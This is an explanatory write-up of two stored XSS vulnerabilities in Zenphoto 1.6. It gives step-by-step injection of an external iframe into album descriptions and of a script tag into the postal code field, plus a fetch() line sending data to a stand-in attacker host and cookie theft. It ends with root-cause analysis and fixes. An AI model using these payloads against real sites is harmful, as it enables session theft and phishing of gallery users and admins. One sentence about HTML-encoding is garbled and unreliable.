Zenphoto 1.6 - Multiple stored XSS

Understanding Zenphoto 1.6: Multiple Stored XSS Vulnerabilities

Security researchers have identified critical stored cross-site scripting (XSS) vulnerabilities in Zenphoto 1.6, a widely used PHP-based photo gallery application. These flaws allow attackers to inject malicious scripts that persistently execute when viewed by users, posing a serious threat to both end-users and administrators.

Overview of the Vulnerability

Zenphoto, a lightweight, open-source photo management system, has long been favored for its simplicity and extensibility. However, version 1.6—released in early 2023—contains multiple stored XSS bugs that compromise data integrity and user safety. The vulnerabilities were discovered by Mirabbas Ağalarov on May 1st, 2023, and verified on Linux environments.

Stored XSS differs from reflected XSS in that the malicious payload is saved in the application’s database or file system. Unlike reflected XSS, which requires a crafted URL to trigger, stored XSS attacks are persistent and can affect any user who accesses the vulnerable content.

Exploitation Details: XSS-1 – Album Description Injection

One of the most straightforward exploitation paths involves creating a new album with a malicious description.

1. Access the album creation interface via the admin panel.
2. Enter the following in the Album Description field:

<iframe src="https://14.rs"></iframe>

This HTML snippet embeds a remote iframe, which can be used to redirect users to a malicious website or perform phishing attacks. The iframe is not filtered or sanitized during storage, allowing it to be rendered directly in the gallery view.

Once saved, the malicious content becomes visible to any user visiting the album page:

http://localhost/zenphoto-1.6/index.php?album=new-album

Upon loading, the iframe executes, potentially leading to:

• Stealing user credentials via phishing
• Redirecting users to malicious domains
• Injecting malware via JavaScript execution

Exploitation Details: XSS-2 – User Profile Data Manipulation

A second, more subtle vulnerability arises in the user account management section. When administrators modify user data—specifically the postal code field—malicious scripts can be stored directly in the database.

Steps to exploit:

1. Navigate to the user management page: http://localhost/zenphoto-1.6/zp-core/admin-users.php?page=users
2. Modify the postal code field to include:

<script>alert(4)</script>

If the application renders user data as HTML without proper sanitization, this script will execute automatically when the profile is viewed by an admin or other authorized user.

While this example uses alert(4) for demonstration, in real-world scenarios, attackers could use:

• document.cookie to steal session tokens
• fetch('https://attacker.com/steal') to exfiltrate data
• eval() to execute arbitrary code

This vulnerability highlights a critical flaw in input handling—the application fails to sanitize user-provided data before rendering it in the frontend.

Impact and Risk Assessment

Vulnerability	Severity	Exploitation Ease	Impact
XSS-1: Album Description	High	Easy	Public exposure, phishing, session hijacking
XSS-2: User Profile Data	High	Medium	Admin-level compromise, data leakage

Both vulnerabilities allow attackers to persistently inject code into the application’s output. Given that Zenphoto is often deployed in public-facing environments, these flaws can lead to widespread exploitation.

Root Cause Analysis

These XSS vulnerabilities stem from two primary issues:

• Missing input sanitization: The application does not validate or escape user input before storing or displaying it.
• HTML rendering without filtering: User data—such as album descriptions and profile fields—is rendered directly in the browser without escaping special characters.

For example, the <script> tag is not converted to <script> (HTML-encoded), allowing execution.

Recommended Fixes and Best Practices

To mitigate these risks, developers should implement the following security measures:

• Use HTML escaping functions like htmlspecialchars() in PHP before outputting user data.
• Implement input validation using whitelisting or regex patterns to restrict allowed characters.
• Enable Content Security Policy (CSP) headers to block inline scripts and iframe sources.
• Use secure session management to prevent session theft via XSS.

Example Fix: Replace unsafe output with sanitized rendering:

<?php
// Unsafe: Direct output
echo $album_description;

// Safe: Sanitized output
echo htmlspecialchars($album_description, ENT_QUOTES, 'UTF-8');
?>

By escaping special characters, the browser treats the input as plain text, preventing script execution.

Conclusion

Zenphoto 1.6’s stored XSS vulnerabilities demonstrate the importance of secure input handling in web applications. Even seemingly benign fields like postal code or album description can become attack vectors if not properly sanitized.

For users and administrators, immediate action is advised:

• Update to a patched version if available
• Apply input validation rules manually
• Monitor logs for suspicious activity

Security is not a one-time task—it requires continuous vigilance, especially in open-source projects where community contributions may introduce unforeseen risks.